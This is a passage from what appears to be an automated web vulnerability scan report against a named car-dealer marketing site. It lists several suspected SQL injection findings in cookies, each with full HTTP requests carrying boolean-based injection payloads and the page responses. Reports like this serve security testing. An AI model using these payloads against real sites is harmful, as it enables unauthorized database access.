Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586%20and%201%3d1--%20; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19918
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/vid
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586%20and%201%3d2--%20; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20131
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003679; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Sp
...[SNIP]...
1.22. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/contact/ cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./company/contact/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1%20and%201%3d1--%20; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20134
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003318; expires=Mon, 16-Apr-2012 01:21:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http
...[SNIP]...

Request 2

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1%20and%201%3d2--%20; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20182
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The changes we've noticed since we've switched over have been absolutely dramatic. Not only has our conversion rate increased but our time on site is up...people used to spend 4-5 minutes on our site, now it's almost 8. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search en
...[SNIP]...
1.23. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/dealer-groups/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 81297025'%20or%201%3d1--%20 and 81297025'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.181297025'%20or%201%3d1--%20; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20125
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002538; expires=Mon, 16-Apr-2012 01:08:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We wanted to be a true eCommerce portal and other providers weren't able to do what we wanted. After searching, it was a complete no-brainer. Dealer.com has all the capabilities we needed.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotligh
...[SNIP]...

Request 2

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.181297025'%20or%201%3d2--%20; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20172
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002539; expires=Mon, 16-Apr-2012 01:08:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've been a client of Dealer.com going on 2 years. It's been an awesome relationship right from the get-go.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /><
...[SNIP]...
1.24. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/dealer-groups/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/online-advertising/ cookie appears to be vulnerable to SQL injection attacks. The payloads 17967680%20or%201%3d1--%20 and 17967680%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./products/online-advertising/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=117967680%20or%201%3d1--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20280
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002479; expires=Mon, 16-Apr-2012 01:07:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The changes we've noticed since we've switched over have been absolutely dramatic. Not only has our conversion rate increased but our time on site is up...people used to spend 4-5 minutes on our site, now it's almost 8. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
